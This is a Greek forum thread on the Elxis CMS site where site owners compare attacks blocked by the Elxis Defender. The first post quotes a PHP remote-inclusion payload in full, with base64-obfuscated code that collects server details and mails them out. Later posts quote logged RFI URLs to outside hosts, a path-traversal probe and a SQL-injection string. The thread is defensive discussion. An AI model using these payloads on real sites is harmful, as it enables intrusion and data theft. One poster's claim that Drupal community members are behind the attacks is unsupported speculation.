Elxis CMS Forum
Ελληνικό Forum => Δημόσιο Βήμα => Topic started by: webgift on December 18, 2010, 16:19:21
-
Έχω την υποχρέωση να ανοίξω ένα τέτοιο θέμα θεωρώντας πόσοι τύποι είναι εκεί έξω που όλη μέρα κάθε μέρα προσπαθούν να ρίξουν σελίδες παίζοντας το έξυπνοι.
Τα ηλίθια παλικάρια που σκάσανε μύτη σήμερα ήταν οι Karaw4nghacK πρέπει να αλλάξουν το όνομά τους γιατί δεν είναι καλλιτεχνικό θα έλεγα. ;D Προσπάθησαν λοιπόν με την εντολή στο link
/index.php?option=com_urunler&mosConfig.absolute.path=
Να φορτώσουν ένα txt αρχείο που γράφει τα παρακάτω :
--------
<?
$win = strtolower(substr(PHP_OS,0,3)) == "win";
echo "shepdoy<br>";
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
{
$safemode = true;
$hsafemode = "�4ON(BuSuK)�6";
}
else {$safemode = false; $hsafemode = "�3OFF(WoKeH)�6";}
$xos = wordwrap(php_uname(),90,"<br>",1);
$xpwd = @getcwd();
$OS = "[Safe-mode:".$hsafemode."] [Kernel:".$xos."]";
echo "<center><A class=ria href=\"http://".$OS."\">shepdoy</A></center><br>";
echo "<br>OSTYPE:$OS<br>";
echo "<br>Pwd:$xpwd<br>";
eval(base64_decode("JGNyZWF0b3IgPSBiYXNlNjRfZGVjb2RlKCJjbUZqY21WM2JHOW5RR2R0WVdsc0xtTnZiUT09Ii
k7ICgkc2FmZV9tb2RlKT8oJHNhZmVtb2RlPSJPTiIpOigkc2FmZW1vZGU9Ik9GRiIpOyAkYmFzZT0iaHR0cDovLyIuJF9TR
VJWRVJbJ0hUVFBfSE9TVCddLiRfU0VSVkVSWydSRVFVRVNUX1VSSSddOyAgJG5hbWUgPSBwaHBfdW5hbWUoKTsg
JGlwID0gZ2V0ZW52KCJSRU1PVEVfQUREUiIpOyAkaG9zdCA9IGdldGhvc3RieWFkZHIoJF9TRVJWRVJbUkVNT1RFX0FE
RFJdKTsgJHN1YmogPSAkX1NFUlZFUlsnSFRUUF9IT1NUJ107ICAkbXNnID0gIlxuQkFTRTogJGJhc2VcbnVuYW1lIC1hOi
AkbmFtZVxuSVA6ICRpcFxuSG9zdDogJGhvc3RcbiRwd2RzXG4iOyAkZnJvbSA9IkZyb206IE1PREVfPSIuJHNhZmVtb2RlL
iI8dG9vbEAiLiRfU0VSVkVSWydIVFRQX0hPU1QnXS4iPiI7IG1haWwoICRjcmVhdG9yLCAkc3ViaiwgJG1zZywgJGZyb20pOw=="));
die("<center>Karaw4nghacK Was Here!!!</center>");
?>
------
Και ερωτώ: που πας ρε καραμήτρο ; Εδώ έχουμε Elxis!Τράβα να βρεις κανένα site με Joomla που δεν έχει βάλει το security update 1.1.23.13.412.5124.152.123.α και μετά τα λέμε!
// Το εν λόγω άτομο προσπάθησε από 2 διαφορετικές ip με 2 παραπλήσια αρχεία txt και πήρε τα ( να μην πω τι λέξη) :-[
Και ναι είναι αλήθεια το παλικάρι συνεχίζει με 3 Ip To αρχείο αυτή την φορά εδώ : http://gm.mapserverpro.com/cartoweb3/www-data/ID-RFI.txt
Άνοιξα λοιπόν το θέμα αυτό για να δείξω ότι πράγματα που θεωρούνται σίγουρα και βέβαια με μια λάθος επιλογή εγκυμονούν κινδύνους και μεγάλες απώλειες.
-
Θα ήταν χρήσιμο κάποια στιγμή να υπάρξει ένας οδηγός για την παραμετροποίηση του defender για το elxis :)
-
Αντρέα όταν λες παραμετροποίηση τι ακριβώς εννοείς;
// Ο τύπος ακόμα προσπαθεί ;D ;D ;D
-
com_urunler? έχει κανεις ιδέα τι είναι αυτό?
-
O τύπος δεν είναι τούρκικο component ... Τούρκικο σήριαλ είναι ... ;D
Παρά ταύτα οι Ips που έρχονται φαίνονται από Αμέρικα.
-
ναι, το βρήκα γιαυτό και το έκανα edit ... είναι image gallery component
-
Έχει φάει τα λυσακά του λέμε και άλλο ! Τι κάνει ο άσχετος ;:
Do not reply to this e-mail
This is a notification e-mail from Elxis Defender
Elxis Defender blocked an attack to your site
ATTACKER IP ADDRESS: 64.15.156.75 (blocked)
Requested URI: //index.php?option=com_registration&mosConfig.absolute.path=http://gm.mapserverpro.com/cartoweb3/www-data/myid.jpg?
DATE: 18-12-2010 16:56:21
Attack was logged
Site turned offline for 5 seconds
Note: Elxis Defender wont send you another notification for the next 5 minutes even if more attacks occured.
---------------------------------------------------
ELXIS DEFENDER by Elxis Team
---------------------------------------------------
ναι, το βρήκα γιαυτό και το έκανα edit ... είναι image gallery component
Και να φανταστείς ότι δεν έχω βάλει κάποιο component Image gallery στο site!
-
Αντρέα όταν λες παραμετροποίηση τι ακριβώς εννοείς;
// Ο τύπος ακόμα προσπαθεί ;D ;D ;D
Τα φίλτρα που πρέπει οπωσδήποτε να κάνουμε χρήση
-
Προφανώς τα φίλτρα με κόκκινο χρώμα θεωρούνται απαραίτητα.
Από εκεί και πέρα είναι στην κρίση του καθενός τι θέλει να έχει.
Στην επιλογή όλως των φίλτρων κερδίζεις άλλα χάνεις στον :
Χρόνος Καθυστέρησης
Η χρήση του Υπερασπιστή κάνει το Elxis να τρέχει λίγο αργότερα από ότι συνήθως. Η προσθήκη πολλών φίλτρων μπορεί να αυξήσει το χρόνο εκτέλεσης της php αρκετά. Σας συνιστούμε να μην προσθέσετε πάνω από 15 φίλτρα αλλά ταυτόχρονα σας παρακινούμε να πειραματιστείτε καθώς αυτό εξαρτάται από την ιστοσελίδα και το διακομιστή. Καλέστε κάποιον ειδικό για βοήθεια αν αντιμετωπίζετε δυσκολίες. Οι εργαστηριακές μας μετρήσεις έδειξαν χρόνο καθυστέρησης από 0,1 ως 27 msec ανάλογα με τον αριθμό των φίλτρων (από 10 ως 30) και τις δηλωμένες μεταβλητές εισόδου τις οποίες είχε να αντιμετωπίσει ο Υπερασπιστής (από συνήθη περιήγηση, ως υποβολή μεγάλων κειμένων μέσω της μεθόδου POST ή GET).
Οπότε επιλέγεις και παίρνεις.!
-
οκ ευχαριστώ, χρήσιμες πληροφορίες
-
;) Να σε καλά Αντρέα.
Ακόμα συνεχίζουν οι επιθέσεις !
-
Σήμερα... και για πρώτη φορά 10 επιθέσεις μαζεμένες.... Τι κάνουν;;;
-
Εμένα με έχουν βάλει στο μάτι για τα καλά.
2 subdomain δέχονται επιθέσεις κατά ριπάς και ένα domain επίσης.
-
Το έχω γράψει και παλιότερα... από εδώ παίρνουν τα sites για να δοκιμάσουν τις αντοχές του Elxis.
WebGift σου στέλνω ένα p.m. με κάτι που θέλω να ρωτήσω....
-
Ok.! Προσωπικά δεν φοβάμαι. Φαίνονται άσχετοι!
-
Όλα καλά πήγαν WebGift. Σ` ευχαριστώ! Σταμάτησε στο 11 για σήμερα (μάλλον βαρέθηκε). Γιατί χαραμίζουν έτσι το χρόνο τους... Άσε που πιστεύω πώς ξέρει πολύ καλά την ελληνική γλώσσα...
-
Να σε καλά Δημήτρη!
Μπορεί να συνεχίσει αργότερα. Δεν πειράζει έχουμε Elxis ;)
-
χμ, στο πρώτο σου μήνυμα WebGift, στον κώδικα που πάνε να σου τρέξουν, από τα λίγα που μπορώ να καταλάβω, το πρώτο πράγμα που ψάχνουν είναι αν είναι το safemode on
αυτη η εντολή λοιπόν τι κάνει (9η γραμμή)?
else {$safemode = false; $hsafemode = "�3OFF(WoKeH)�6";}
Καταλαβαίνω καλά ή κάνω λάθος; Παρακάμπτει το safemode off της php για να κάνει το script τη δουλειά του; Γίνεται αυτό το πράγμα?
-
Αυτό που βλέπεις είναι μεταβλητές απλά. Μπορεί ο άλλος να γράψει μεταβλητή $eimai_malakas !!! Δεν σημαίνει ότι ψάχνει αν είναι ή όχι ;) ;D
Από αυτό που κάνει (εντελώς Joomla τεχνικές) προσπαθεί να ορίσει το απόλυτο path του εκάστοτε site ( mosConfig.absolute.path)στο αντίστοιχο αρχείο που δηλώνει κάθε φορά από το URL.
-
Ήταν ένα φορτωμένο Σ/Κ. Πολλές ειδοποιήσεις - πάρα πολλές!
-
Μόλις ανακάλυψα ότι το σύνολο των επιθέσεων προέρχονται από άτομα της κοινότητας Drupal.
-
Πως το ανακάλυψες αυτό ρε Μάστορα; ???
-
Τι ξεκινάνε "πόλεμο" ;
-
Καλημέρα!Γνωρίζουμε ότι δεν είναι απόλυτα σωστό αυτό που θα πω άλλα στο σύνολο των επιθέσεων από την Παρασκευή έως σήμερα προσπαθούν να αλλάξουν την μεταβλητή absolutepath μέσω αρχείων που φιλοξενούνται σε σελίδες με αρχικό domain σε Drupal. Τυχαίο ; :D
Αν δεν είναι σωστή η παραπάνω διατύπωση είναι επειδή μόλις ξύπνησα!
-
Καλημέρα!Γνωρίζουμε ότι δεν είναι απόλυτα σωστό αυτό που θα πω άλλα στο σύνολο των επιθέσεων από την Παρασκευή έως σήμερα προσπαθούν να αλλάξουν την μεταβλητή absolutepath μέσω αρχείων που φιλοξενούνται σε σελίδες με αρχικό domain σε Drupal. Τυχαίο ;
μην μπερδευόσαστε... τα αρχεια που βλέπεις εκει 101% δεν τα εχουν παρει χαμπάρι οι ιδιοκτήτες...
παντα έτσι γίνεται... εκει(και σε πολλές αλλες μεριές) εχουν τα αρχεία... μετα τα μοιράζουν και σε άλλα site ....
τι νομιζες? καθε φορά τα ανεβάζουν από τον υπολογιστή τους?
μια πολύ συνηθισμένη περίπτωση :
συνήθως εχουν ξεκωλιάσει ένα site που το έχουν κανει αποθήκη και απο εκεί μοιράζουν διάφορες φόρμες(τραπεζας,paypal κτλ.) σε άλλα site.... που κανουν post την φορμα στην "αποθήκη" όπου συλλέγουν τα στοιχεία...
μετά σε άλλο τρίτο site που έχει paypal-πιστωτικές κτλ.. το μαστορεύουν κατάλληλα ή(kai) στέλνοντας παραπλανητικά email(από μαστορεμένο server) στέλνουν τα θύματα στις φόρμες Μαϊμού απο τα δεύτερα sites και γεμίζουν την αποθήκη στο άλλο site με στοιχεία κτλ....
πάντα έχουν 1-2-3 αποθήκες και δεκάδες-εκατοντάδες φόρμες να περιφέρονται και χιλιάδες θύματα!
με λίγα λόγια η δουλεία γίνεται πάντα μέσω τρίτου!
τα κλεμμένα δεν τα πάει ο κλέφτης στο σπίτι του!
*************
γιατί χτυπάνε το ελχις?
έχουν τα δικα τους crawler και σκαναρουν συνέχεια... για joomla και συναφή-κώδικα sites...
κάνουν τις λίστες τους και όταν ερθει ή ώρα χτυπάνε...
συνήθως όλες αυτές οι επιθέσεις είναι αυτοματοποιημένες...
και προέρχονται από κάποια "αποθήκη"!
γιατί αυτό το ΣΚ φάγαμε όλοι από μία επίθεση τουλάχιστον?
γιατί τα δικά μας site λίγο πολύ είναι σχετικά και άμα βρούμε του ενός βρήκαμε και του άλλου...
οπότε μπήκαμε όλοι μαζί στην ίδια λίστα... αύριο σειρά μπορεί να έχουν όλα τα ιταλικά..
γιατί πάντα την βγάζουμε καθαρη?
Defender ;D
-
Κώστα έχεις δίκιο σε αυτό που λες. Εντάξει δεν είμαι και απόλυτα σίγουρος για την σκέψη που έκανα. Μου κάνει όμως εντύπωση πως γίνεται να έχουν κάνει τόσα Drupal Sites αποθήκες. Τόσο ανοιχτά είναι ; Μιλάμε γύρω στα 25-30 σελίδες αναφέρομαι. Δεν ξέρω πάντως πιστεύω ότι η επίθεση αυτή προέρχεται από κοινότητα. Ή από μέλη αυτής.
Θα συμφωνήσω σχετικά με τις αυτοματοποιημένες επιθέσεις που ανάφερες, τον Defender ;) και θα προσθέσω στην ερώτηση : γιατί χτυπάνε το ελχις? ... γιατί ζηλεύουν ! :P
-
Πόσο πια σουρωτήρι είναι αυτό το Drupal? Έχει μπει black listed εδώ και καιρό. Ούτε να το βλέπω...
-
ίσως βρήκανε κάποιο κενό ασφαλείας στο drupal ή σε συγκεκριμένο server...
όταν λείπει η γάτα(ασφάλεια) χορεύουν τα ποντίκια
αποκλείεται να είναι μέλη...
αν ήταν τότε δεν θα εκτίθονταν και δεν εκτεθεταν και το drupal!
-
Να κάνω την απλή ερώτηση για να δούμε σε τι συμπεράσματα βγαίνουμε. Όταν σε ένα CMS από τον κώδικά του ορίζει την μεταβλητή absolutepath ως απόλυτη διαδρομή φακέλου όπου τρέχει μια ιστοσελίδα και δεν δέχεται να ορισθούν στην μεταβλητή αυτή αρχεία και πόσο μάλλον αρχεία φωτογραφίας jpg αυτό τι σας λέει ότι έχουν γνώση ή είναι άσχετοι ;
Όλες οι επιθέσεις προσπαθούν να αλλάξουν την μεταβλητή αυτή την μια ορίζοντας ένα txt αρχείο και την άλλη που το είδα και αυτό να βάλουν φωτογραφία !!
-
Πόσο πια σουρωτήρι είναι αυτό το Drupal? Έχει μπει black listed εδώ και καιρό. Ούτε να το βλέπω...
Το drupal, απ' όσο ξέρω, είναι πιο ασφαλές από το joomla...
-
Και γω αυτήν την εντύπωση έχω. Τώρα.!
-
γιατί χτυπάνε το ελχις? ... γιατί ζηλεύουν ! :P
Εντάξει, και που ξέρουμε οτι μόνο το ελχις χτυπάνε;
Δέχομαι κι εγώ επιθέσεις αυτό τον καιρό, προφανώς είμαστε στην ίδια λίστα όλοι. Ρίξτε μια ματιά πως έχει γίνει ο blocker του defender μέσα σε 2 βδομάδες.
Εγώ πιστεύω οτι σε αυτή την λίστα είναι δεκάδες χιλιάδες άλλοι κακόμοιροι (joomla, wordpress, προφανώς drupal) και πολλοί από αυτούς τώρα εμφανίζουν στις οθόνες τους το Karaw4nghacK Was Here!!!. Απλά, εμείς βρισκόμαστε στη λίστα γιατί αυτοί που την έχουν φτιάξει δεν ξέρουν οτι χρησιμοποιούμε elxis.
[attachment deleted by admin]
-
Και γω αυτήν την εντύπωση έχω. Τώρα.!
Τι σου άλλαξε... την γνώμη;;
-
Άδειαζε την λίστα, δεν έχει νόημα να την διατηρείς με τόσες πολλές καταγραφές. Έτσι κι αλλιώς οι ip τους αλλάζουν συνεχώς. Αδειάζοντας την λίστα κάνεις και γρηγορότερο τον defender.
-
Και γω αυτήν την εντύπωση έχω. Τώρα.!
Τι σου άλλαξε... την γνώμη;;
Όσο δεν το δουλεύω δεν μπορώ να έχω γνώμη. Θεωρητικά πάντα από κάποιους ελέγχους που κάνω κατά καιρούς το συμπέρασμα που βγαίνει είναι ότι το drupal είναι πιο ασφαλής από το Joomla. Τώρα αν δεν το δουλέψω - σκανάρω δεν μπορώ να πω γνώμη.!
Κρατάω τις επιφυλάξεις μου Arxos.
Πονάει όταν το Elxis εξελίσσεται πολλούς και διάφορους ανθρώπους.
-
Κρατήστε και τις επιφυλάξεις σας για το Drupal. Το αν είναι πιο ασφαλές από το Joomla, δεν λέει απολύτως τίποτα. Εμείς δουλεύουμε με το Elxis, άρα αυτό πρέπει να είναι το κριτήριο.
Δεν μπορώ να πω παραπάνω, καθώς είναι ΔΗΜΟΣΙΟ βήμα εδώ... αλλά είχα μια πολύ κακή εμπειρία με το Drupal. Μακρυά από μας.
-
Αδειάζοντας την λίστα κάνεις και γρηγορότερο τον defender.
.. ups ... ξαφνικά το site πετάει ;D ;D ;D
-
Αδειάζοντας την λίστα κάνεις και γρηγορότερο τον defender.
.. ups ... ξαφνικά το site πετάει ;D ;D ;D
;)
-
Σήμερα είχα νέα επίθεση γράφοντας ... :
/index2.php?option=com_content&do_pdf=1&id=24/**/aND/**/8=8
-
το φίλτρο σου είναι το /**/ ?
Εγώ το είχα βάλει και είχε μπλοκάρει τους μισούς επισκέπτες μου, που σίγουρα δεν είχαν ούτε τις προθέσεις αλλά ούτε και τις γνώσεις να μου κάνουν επίθεση. Λέτε να ήταν "μολυσμένοι" ή το 2006.4 (ή κάποιο bot-component) να το χρησιμοποιούσε ?
-
Καλό είναι να κρατάμε τα χαρτιά μας κλειστά στο δημόσιο τμήμα.! Σου στέλνω PM.!
-
Παίδες μην ξεχνάτε ότι ο defender δεν μπλοκάρει μόνο το GET, αλλά και τα POST, REQUEST, COOKIE. Συνεπώς μην κοιτάτε μόνο την URL που σας γράφει ο defender στο email που στέλνει. Αυτό είναι για ενημέρωσή σας σε ποια ακριβώς σελίδα έγινε η φραγή. Το τι ακριβώς έφραξε δεν φαίνεται στην URL παρα μόνο αν η μέθοδος είναι GET.
-
Η αλήθεια είναι ότι βλέπουμε σχολιάζουμε ;D
-
Νέες επιθέσεις σήμερα (απόπειρες εννοείτε ;D )..
Elxis Defender blocked an attack to your site
ATTACKER IP ADDRESS: 62.181.230.205
Requested URI: //index.php?option=com_content&mosConfig.absolute.path=../../../../../../../../../../../../../../../proc/self/environ\0
DATE: 08-06-2011 07:14:54
Attack was logged
---------------------
Elxis Defender blocked an attack to your site
ATTACKER IP ADDRESS: 122.203.211.200
Requested URI: //index.php?option=com_content&mosConfig.absolute.path=http://www.blejtash.com//includes/ID-RFI.txt??
DATE: 08-06-2011 07:22:46
--------------------------
ATTACKER IP ADDRESS: 124.150.142.86
Requested URI: //index.php?option=com_content&mosConfig.absolute.path=http://www.vipekaem.ru/images/vero.jpg??
DATE: 08-06-2011 10:21:54
-
Karaw4nghacK Was Here!!! :D :D
Α τα καημένα .. το exploit είναι του 2006. Κάποιος το ανακάλυψε πρόσφατα και χάρηκε :D :D